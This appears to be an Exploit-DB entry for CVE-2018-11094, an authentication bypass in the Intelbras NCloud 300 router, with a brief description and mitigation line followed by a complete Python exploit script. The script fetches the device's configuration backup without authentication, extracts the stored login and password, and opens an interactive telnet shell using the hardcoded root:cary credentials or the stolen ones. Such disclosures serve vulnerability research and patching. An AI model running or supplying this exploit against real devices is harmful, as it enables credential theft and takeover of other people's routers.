Intelbras NCloud Authentication bypass

vendor:

NCloud

by:

Pedro Aguiar

9.8

CVSS

CRITICAL

Authentication Bypass

287

CWE

Product Name: NCloud

Affected Version From: 1.0

Affected Version To: 1.0

Patch Exists: YES

Related CWE: CVE-2018-11094

CPE: h:intelbras:ncloud

Metasploit: N/A

Other Scripts: N/A

Platforms Tested: Linux

2018

Intelbras NCloud Authentication bypass

As described here: https://blog.kos-lab.com/Hello-World/ the Ncloud 300 device does not properly enforce authentication, allowing an attacker to remotely download the configurations backup ('/cgi-bin/ExportSettings.sh'). The configurations backup file contains the web interface username and password. Also, there are hardcoded credentials in the telnet service (root:cary), in cases where root user does not exist, it was replaced by the web interface credentials. This exploit downloads the backup file and tries to use the credentials to log into the device using telnet.

Mitigation:

Enforce authentication for all services and disable telnet service.

Source

Exploit-DB raw data:

# coding: utf-8
# Exploit Title: Intelbras NCloud Authentication bypass
# Date: 16/05/2018
# Exploit Author: Pedro Aguiar - pedro.aguiar@kryptus.com
# Vendor Homepage: http://www.intelbras.com.br/
# Software Link: http://www.intelbras.com.br/empresarial/wi-fi/para-sua-casa/roteadores/ncloud
# Version: 1.0
# Tested on: Linux
# CVE : CVE-2018-11094
# Description: As described here: https://blog.kos-lab.com/Hello-World/ the Ncloud 300 device does not properly
# enforce authentication, allowing an attacker to remotely download the configurations backup ('/cgi-bin/ExportSettings.sh').
# The configurations backup file contains the web interface username and password. 
# Also, there are hardcoded credentials in the telnet service (root:cary), in cases where root user does not exist, 
# it was replaced by the web interface credentials. This exploit downloads the backup file and tries to use the credentials
# to log into the device using telnet.

import sys
import requests
import telnetlib
import re

def help():
    print 'Usage: '
    print 'python exploit.py http://192.168.0.1'

def pop_shell(host, user, password):
    if(user == "root"):
        print '[+] Trying default credentials: root:cary'
    else:
        print '[+] Trying credentials obtained from /cgi-bin/ExportSettings.sh'
        with open('NCLOUD_config.dat', "r") as f:
            content = f.read()
            user = content.split("Login=")[1].split("\n")[0]
            password = content.split("Password=")[1].split("\n")[0]
            #print 'User: '+ user
            #print 'Password: '+ password
            f.close()
    try:
            ip = re.findall( r'[0-9]+(?:\.[0-9]+){3}', host)[0]
            tn = telnetlib.Telnet(ip, 23, timeout=10)
            tn.expect(["WORKGROUP login:"], 5)
            tn.write(user + "\r\n")
            tn.expect(["Password:"], 5)
            tn.write(password + "\r\n")
            i = tn.expect(["Login incorrect"], 5)
            if i[0] != -1:
                raise ValueError('[-] Wrong credential')
            tn.write("cat /proc/cpuinfo\r\n")
            tn.interact()

            tn.close()
    except Exception as e:
        print e
        if(user == "root"):
            pop_shell(host, 'try', 'again')

def exploit(host):
    print '[*] Connecting to %s' %host
    path = '/cgi-bin/ExportSettings.sh'
    payload = 'Export=Salvar'

    response = requests.post(host + path, data=payload)
    response.raise_for_status()

    if(response.status_code == 200 and "Login=" in response.text):
        print '[+] Config download was successful'
        print '[+] Saving backup file to NCLOUD_config.dat'
        with open('NCLOUD_config.dat', "w") as f:
            f.write(response.text)
            f.close()
        pop_shell(host, "root", "cary")
def main():
    if len(sys.argv) < 2 or not sys.argv[1].startswith('http://'):
        help()
        return
    host = sys.argv[1]
    exploit(host)

if __name__ == '__main__':
    main()